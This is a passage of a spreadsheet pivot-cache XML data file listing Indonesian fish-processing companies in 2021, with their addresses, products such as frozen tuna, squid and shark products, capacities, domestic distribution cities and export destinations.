    <s v="Australia, Canada, China, Hong Kong, Korea, Democratic People's Republic of, Russian Federation, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24446"/>
    <x v="1034"/>
    <s v="PT, HYDROCOLLOID INDONESIA"/>
    <s v="Kawasan Industri Brantamulya, Jl, Tengsaw No,3 Kp, Babakan RT 004 RW 002, Kel, Tarikolot, Kec, Citeureup, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Semi Refined Carrageenan"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="Japan, Russian Federation, United States"/>
  </r>
  <r>
    <n v="24447"/>
    <x v="483"/>
    <s v="PT. CITRARAJA AMPAT CANNING"/>
    <s v="Jl. Ahmad Yani Klademak I, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Kaleng"/>
    <d v="2021-03-23T00:00:00"/>
    <n v="531000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Surabaya"/>
    <s v="Switzerland"/>
  </r>
  <r>
    <n v="24448"/>
    <x v="483"/>
    <s v="PT. CITRARAJA AMPAT CANNING"/>
    <s v="Jl. Ahmad Yani Klademak I, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Loin Segar"/>
    <d v="2021-03-23T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24449"/>
    <x v="483"/>
    <s v="PT. CITRARAJA AMPAT CANNING"/>
    <s v="Jl. Ahmad Yani Klademak I, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Loin Masak Beku"/>
    <d v="2021-03-23T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="24450"/>
    <x v="483"/>
    <s v="PT. CITRARAJA AMPAT CANNING"/>
    <s v="Jl. Ahmad Yani Klademak I, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Pelagis Beku (Kembung, Tenggiri, Cakalang, Baby Tuna)"/>
    <d v="2021-03-23T00:00:00"/>
    <n v="76900"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24451"/>
    <x v="1035"/>
    <s v="KIM TJUNG"/>
    <s v="Jl. Pelantar Asam/KUD No.120, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Bawal, Kembung, Selar, Tamban, Benggol, Tenggiri)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="69000"/>
    <s v="Kabupaten Lingga, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24452"/>
    <x v="1035"/>
    <s v="KIM TJUNG"/>
    <s v="Jl. Pelantar Asam/KUD No.120, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Kerisi, Manyung, Kerapu, Merah, Kakap, Kaci-kaci, Ekor Kuning)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="46000"/>
    <s v="Kabupaten Lingga, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24456"/>
    <x v="126"/>
    <s v="PT. KIRANA FOOD INTERNATIONAL"/>
    <s v="Jl. Raya Pakah Ponco, Kel. Sumberagung, Kec. Plumpang, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Kipas Beku"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="80000"/>
    <s v="Kabupaten Tuban, Kabupaten Gresik, Kota Surabaya"/>
    <s v="Australia, Canada, China, Japan, Korea, Democratic People's Republic of, Russian Federation, United Kingdom, United States"/>
  </r>
  <r>
    <n v="24457"/>
    <x v="1036"/>
    <s v="PT. TENAGAGANDA SUMATERA"/>
    <s v="Jl. Irian Barat No.253 Pasar V, Kel. Sampali, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ubur-ubur Asin"/>
    <d v="2021-06-14T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24460"/>
    <x v="493"/>
    <s v="PT. KELOLA BIRU HARMONI"/>
    <s v="Jl. Industri II, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Doversole, Lencam, Kuniran, Kerapu, Kakatua, Pinjalo, Kakap, Kaci-kaci, Guntur, Barramundi)"/>
    <d v="2021-04-19T00:00:00"/>
    <n v="360000"/>
    <m/>
    <s v="Australia, Canada, China, Korea, Democratic People's Republic of, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24461"/>
    <x v="493"/>
    <s v="PT. KELOLA BIRU HARMONI"/>
    <s v="Jl. Industri II, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemadang, Tenggiri, Cobia)"/>
    <d v="2021-04-19T00:00:00"/>
    <n v="225000"/>
    <m/>
    <s v="Australia, Canada, China, France, Korea, Democratic People's Republic of, Russian Federation, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24462"/>
    <x v="493"/>
    <s v="PT. KELOLA BIRU HARMONI"/>
    <s v="Jl. Industri II, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-19T00:00:00"/>
    <n v="570000"/>
    <m/>
    <s v="Australia, Canada, China, France, Korea, Democratic People's Republic of, Russian Federation, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24463"/>
    <x v="493"/>
    <s v="PT. KELOLA BIRU HARMONI"/>
    <s v="Jl. Industri II, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-19T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Canada, China, Japan, Korea, Democratic People's Republic of, Russian Federation, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24464"/>
    <x v="493"/>
    <s v="PT. KELOLA BIRU HARMONI"/>
    <s v="Jl. Industri II, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Gurita Rebus Beku"/>
    <d v="2021-04-19T00:00:00"/>
    <n v="240000"/>
    <m/>
    <s v="Australia, Canada, China, France, Korea, Democratic People's Republic of, Russian Federation, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24465"/>
    <x v="493"/>
    <s v="PT. KELOLA BIRU HARMONI"/>
    <s v="Jl. Industri II, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2021-04-19T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Canada, China, France, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24466"/>
    <x v="493"/>
    <s v="PT. KELOLA BIRU HARMONI"/>
    <s v="Jl. Industri II, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kipas Beku"/>
    <d v="2021-04-19T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="Australia, Canada, China, Korea, Democratic People's Republic of, Russian Federation, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24475"/>
    <x v="83"/>
    <s v="PT. MALASINA JAYA WALET"/>
    <s v="Jl. Raya Buncitan Dusun Duran RT 23 RW 07, Kel. Buncitan, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Segar (Kakap Putih, Mata Besar, Bawal, Kerapu, Kakap, Kuro, Kurisi)"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara, Kota Tangerang"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24476"/>
    <x v="83"/>
    <s v="PT. MALASINA JAYA WALET"/>
    <s v="Jl. Raya Buncitan Dusun Duran RT 23 RW 07, Kel. Buncitan, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Segar"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara, Kota Tangerang"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24477"/>
    <x v="83"/>
    <s v="PT. MALASINA JAYA WALET"/>
    <s v="Jl. Raya Buncitan Dusun Duran RT 23 RW 07, Kel. Buncitan, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Segar (Teri, Barakuda, Tongkol, Kembung, Marlin, Tenggiri)"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Tangerang"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24479"/>
    <x v="83"/>
    <s v="PT. MALASINA JAYA WALET"/>
    <s v="Jl. Raya Buncitan Dusun Duran RT 23 RW 07, Kel. Buncitan, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara, Kota Tangerang"/>
    <s v="China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24480"/>
    <x v="83"/>
    <s v="PT. MALASINA JAYA WALET"/>
    <s v="Jl. Raya Buncitan Dusun Duran RT 23 RW 07, Kel. Buncitan, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Keong Beku"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara, Kota Tangerang"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24481"/>
    <x v="83"/>
    <s v="PT. MALASINA JAYA WALET"/>
    <s v="Jl. Raya Buncitan Dusun Duran RT 23 RW 07, Kel. Buncitan, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara, Kota Tangerang"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24482"/>
    <x v="83"/>
    <s v="PT. MALASINA JAYA WALET"/>
    <s v="Jl. Raya Buncitan Dusun Duran RT 23 RW 07, Kel. Buncitan, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Teri, Lemuru, Barakuda, Tongkol, Kembung, Marlin, Tenggiri)"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara, Kota Tangerang"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24484"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Segar"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Japan, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24485"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Segar"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="400"/>
    <m/>
    <s v="China, Hong Kong, Japan, Malaysia, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24486"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Segar"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="450"/>
    <m/>
    <s v="China, Japan, Malaysia, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24487"/>
    <x v="989"/>
    <s v="PT. GERBANG BAHARI SEJAHTERA"/>
    <s v="Jl. Dermaga Pelabuhan Perikanan Muara Angke No.01, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Pari Beku"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24491"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Pari Beku"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="250"/>
    <m/>
    <s v="China, Malaysia, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24492"/>
    <x v="288"/>
    <s v="JONO"/>
    <s v="Jl. Baran Satu Meral RT 002 RW 003, Kel. Baran, Kec. Meral, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Beku (Lemuru, Mata Besar, Kembung, Talang-talang, Sarden, Selar, Tenggiri)"/>
    <d v="2021-02-25T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="24493"/>
    <x v="1037"/>
    <s v="CV. KIRANA HIKARI INDONESIA"/>
    <s v="Pergudangan Fira 51, Jl. Kenjeran No.475-481 Kav 21No.40, Kel. Gading, Kec. Tambaksari, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering"/>
    <d v="2021-06-28T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="24494"/>
    <x v="1037"/>
    <s v="CV. KIRANA HIKARI INDONESIA"/>
    <s v="Pergudangan Fira 51, Jl. Kenjeran No.475-481 Kav 21No.40, Kel. Gading, Kec. Tambaksari, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Minyak Hati Hiu"/>
    <d v="2021-06-28T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24495"/>
    <x v="1038"/>
    <s v="PT. BANDAR NELAYAN"/>
    <s v="Jl. Ikan Tuna IV No.8, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2021-04-07T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24497"/>
    <x v="1038"/>
    <s v="PT. BANDAR NELAYAN"/>
    <s v="Jl. Ikan Tuna IV No.8, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Lemadang, Marlin, Semar, Gindara, Layaran, Tenggiri, Todak, Tongkol)"/>
    <d v="2021-04-07T00:00:00"/>
    <n v="576000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24498"/>
    <x v="1038"/>
    <s v="PT. BANDAR NELAYAN"/>
    <s v="Jl. Ikan Tuna IV No.8, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Beku (Barramundi, Bawal, Sebelah, Senangin, Jahan)"/>
    <d v="2021-04-07T00:00:00"/>
    <n v="576000"/>
    <s v="Kota Jakarta Utara, Kabupaten Rembang, Kabupaten Pati, Kabupaten Jember, Kabupaten Banyuwangi, Kabupaten Situbondo, Kabupaten Sidoarjo"/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24499"/>
    <x v="1038"/>
    <s v="PT. BANDAR NELAYAN"/>
    <s v="Jl. Ikan Tuna IV No.8, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Beku (Cumi-Cumi)"/>
    <d v="2021-04-07T00:00:00"/>
    <n v="2880000"/>
    <m/>
    <s v="China, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24500"/>
    <x v="1039"/>
    <s v="UD. ALFIA"/>
    <s v="RT 11 RW VI, Dusun Muarah, Kel. Padelegan, Kec. Pademawu, Kabupaten Pamekasan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teri Crispy"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Medan, Kabupaten Lampung Selatan, Kota Jakarta Pusat, Kota Surakarta, Kota Surabaya, Kota Pontianak, Kota Balikpapan, Kota Samarinda, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="24510"/>
    <x v="1040"/>
    <s v="UD. HIKMAH SAMUDERA"/>
    <s v="RT 05 RW 01, Dusun Craken, Kel. Sumberharjo, Kec. Pacitan, Kabupaten Pacitan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Kaki Naga, Tahu Bakso Ikan) "/>
    <d v="2021-04-20T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Timur, Kabupaten Pacitan, Kabupaten Ponorogo, Kabupaten Magetan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="24514"/>
    <x v="1041"/>
    <s v="PT, MULTI MONODON INDONESIA"/>
    <s v="Jl, Kima Raya I Blok D-2B, Kel, Kapasa, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="105000"/>
    <m/>
    <s v="Japan, Korea, Republic of, Russian Federation, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24515"/>
    <x v="1042"/>
    <s v="PT. SAMUDERA SEJAHTERA SENTOSA"/>
    <s v="Jl. Dermaga Muara Angke No.8, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi)"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="3000000"/>
    <m/>
    <s v="China, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24516"/>
    <x v="1042"/>
    <s v="PT. SAMUDERA SEJAHTERA SENTOSA"/>
    <s v="Jl. Dermaga Muara Angke No.8, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Beku"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="25000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="24517"/>
    <x v="1042"/>
    <s v="PT. SAMUDERA SEJAHTERA SENTOSA"/>
    <s v="Jl. Dermaga Muara Angke No.8, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Lemadang, Marlin, Gindara, Salem, Cakalang, Tenggiri)"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="125000"/>
    <m/>
    <s v="China, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24518"/>
    <x v="1042"/>
    <s v="PT. SAMUDERA SEJAHTERA SENTOSA"/>
    <s v="Jl. Dermaga Muara Angke No.8, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Bawal Hitam, Lencam, Kerapu, Sukang, Kakap Merah, Ekor Kuning)"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="75000"/>
    <m/>
    <s v="China, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24519"/>
    <x v="1043"/>
    <s v="PT. ARTA MINA JAYA"/>
    <s v="Jl. Poros Wandoka Lingkungan Antapia, Kel. Wandoka Utara, Kec. Wangi-wangi, Kabupaten Wakatobi&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Tuna Segar"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Saudi Arabia"/>
  </r>
  <r>
    <n v="24520"/>
    <x v="1043"/>
    <s v="PT. ARTA MINA JAYA"/>
    <s v="Jl. Poros Wandoka Lingkungan Antapia, Kel. Wandoka Utara, Kec. Wangi-wangi, Kabupaten Wakatobi&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="16000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Malaysia, United States"/>
  </r>
  <r>
    <n v="24521"/>
    <x v="1043"/>
    <s v="PT. ARTA MINA JAYA"/>
    <s v="Jl. Poros Wandoka Lingkungan Antapia, Kel. Wandoka Utara, Kec. Wangi-wangi, Kabupaten Wakatobi&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Demersal Beku (Bawal, Gulama, Lencam, Angoli, Kerapu, Layur, Kakap, Kurau)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Malaysia, United States"/>
  </r>
  <r>
    <n v="24522"/>
    <x v="1043"/>
    <s v="PT. ARTA MINA JAYA"/>
    <s v="Jl. Poros Wandoka Lingkungan Antapia, Kel. Wandoka Utara, Kec. Wangi-wangi, Kabupaten Wakatobi&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Demersal Segar (Bawal, Gulama, Lencam, Angoli, Kerapu, Layur, Kakap, Kurau)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24523"/>
    <x v="1043"/>
    <s v="PT. ARTA MINA JAYA"/>
    <s v="Jl. Poros Wandoka Lingkungan Antapia, Kel. Wandoka Utara, Kec. Wangi-wangi, Kabupaten Wakatobi&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Pelagis Beku (Tongkol, Gabus Laut, Marlin, Gindara, Muroaji, Cakalang, Tenggiri)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="18000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Malaysia, United States"/>
  </r>
  <r>
    <n v="24524"/>
    <x v="1043"/>
    <s v="PT. ARTA MINA JAYA"/>
    <s v="Jl. Poros Wandoka Lingkungan Antapia, Kel. Wandoka Utara, Kec. Wangi-wangi, Kabupaten Wakatobi&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="8000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="24525"/>
    <x v="1044"/>
    <s v="PT. WIRAGUNA JAYA MAKMUR"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Blok C No.6, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Deho, Kembung, Cakalang, Tenggiri)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="48000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="24526"/>
    <x v="1044"/>
    <s v="PT. WIRAGUNA JAYA MAKMUR"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Blok C No.6, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kerapu, Bawal, Kakap)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="24000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="24527"/>
    <x v="1044"/>
    <s v="PT. WIRAGUNA JAYA MAKMUR"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Blok C No.6, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="180000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="24528"/>
    <x v="379"/>
    <s v="CV. FIRDALI SEJAHTERA"/>
    <s v="Room 2 Gudang 77 Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Tuna IV, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="24529"/>
    <x v="379"/>
    <s v="CV. FIRDALI SEJAHTERA"/>
    <s v="Room 2 Gudang 77 Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Tuna IV, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Sebelah, Kerapu, Monkfish, Kakap, Seabass)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24530"/>
    <x v="379"/>
    <s v="CV. FIRDALI SEJAHTERA"/>
    <s v="Room 2 Gudang 77 Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Tuna IV, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Makerel, Salem, Sarden)"/>
